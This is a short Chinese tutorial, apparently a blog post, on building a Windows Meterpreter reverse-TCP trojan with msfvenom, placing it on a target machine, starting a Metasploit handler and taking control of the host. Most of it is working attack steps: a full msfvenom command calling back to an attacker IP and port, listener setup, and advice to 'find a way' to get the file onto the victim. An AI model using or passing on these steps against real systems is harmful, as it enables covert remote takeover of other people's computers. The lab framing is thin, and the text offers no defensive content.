我们先来简单熟悉一下过程:
命令生成木马---->上传木马----->启动监听模块---->运行木马---->控制主机
第一步:使用msfvenom命令生成木马:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.163.167(攻击机的IP地址) lport=9527(攻击机的监听端口) -f exe(可执行文件后缀) > fanxiang.exe(文件名)
第二步:想办法上传木马
因为这里是演示,所以用一个Windows靶机测试,直接拖到Windows靶机里(反正就是想办法将生成的文件搞到靶机里面去)
第三步:开启监听模块
在kali命令行输入msfconsole命令进入msf界面然后输入search /handler搜索监听模块
输入use 7(跟前面的id)使用模块,然后输入show options查看需要我们设置的选项(黄色标注)
黄色选项从上到下依次是,payload(攻击载荷,就是我们生成木马的时候windows/meterpreter/reverse_tcp这一坨),lhost(攻击机地址),lport(攻击机端口)
注意:这三个选项一定要和生成木马的时候设置的一样
利用set 选项 值的方式来设置选项,设置完后就run开始运行监听
第四步(最后一步):靶机运行文件
这个时候我们Windows靶机直接运行文件就可以直接反弹到我们的攻击机上面
然后返回看kali是否获取到了meterpreter,获取到了就说明成功了
到这一步看到meterpreter就说明成功控制了,然后就可以执行一些相关的命令了(命令挺多的,网上找一下哦)